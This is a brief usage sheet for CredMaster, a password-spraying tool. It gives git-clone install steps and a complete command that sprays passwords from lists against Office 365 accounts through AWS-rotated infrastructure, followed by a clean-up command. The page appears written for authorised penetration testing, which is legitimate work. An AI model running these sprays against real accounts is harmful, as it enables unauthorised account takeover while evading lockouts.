CredMaster

Resources

• Main project on GitHub
  • Project Wiki — Good documentation
• Blog walkthrough

Installation

git clone https://github.com/knavesec/CredMaster
 
python3 -m pip install -r requirements.txt

Example usage

• Important: These two options set the BHIS password spraying policy of one password per hour:
  • -d 60 - 60 minute delay between each password
  • --passwordsperdelay 1 - One password between each delay

Launch a password spray:

python3 credmaster.py \
    --access_key '{YOUR AWS ACCESS KEY}' \
    --secret_access_key '{YOUR AWS SECRET KEY}' \
    --plugin o365 \
    -u users.txt \
    -p passwords.txt \
    -a useragents.txt \
    -o ~/output \
    -t 2 \
    -j 10 \
    -d 60 \
    --passwordsperdelay 1

Clean up AWS APIs after spraying:

python3 credmaster.py \
    --access_key '{YOUR AWS ACCESS KEY}' \
    --secret_access_key '{YOUR AWS SECRET KEY}' \
    --clean